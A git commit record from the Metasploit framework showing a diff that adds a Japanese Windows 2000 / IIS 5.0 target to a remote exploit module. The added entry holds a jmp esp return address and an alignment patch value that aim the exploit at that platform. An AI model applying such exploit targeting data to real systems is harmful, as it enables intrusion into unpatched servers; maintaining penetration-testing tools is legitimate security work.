added japanese target from TomokiSanaki

git-svn-id: file:///home/svn/framework3/trunk@7578 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-11-22 01:09:59 +00:00
parent b9939a836f
commit 5dbd32cd98
1 changed files with 9 additions and 0 deletions

View File

@ -68,6 +68,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
},
],
[
# target from TomokiSanaki
'Windows 2000 SP0-SP3 Japanese (IIS 5.0)',
{
'Platform' => 'win',
'Ret' => 0x774fa593, # jmp esp in ?? (Japanese)
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
},
],
],
'DisclosureDate' => 'Aug 31 2009',
'DefaultTarget' => 0))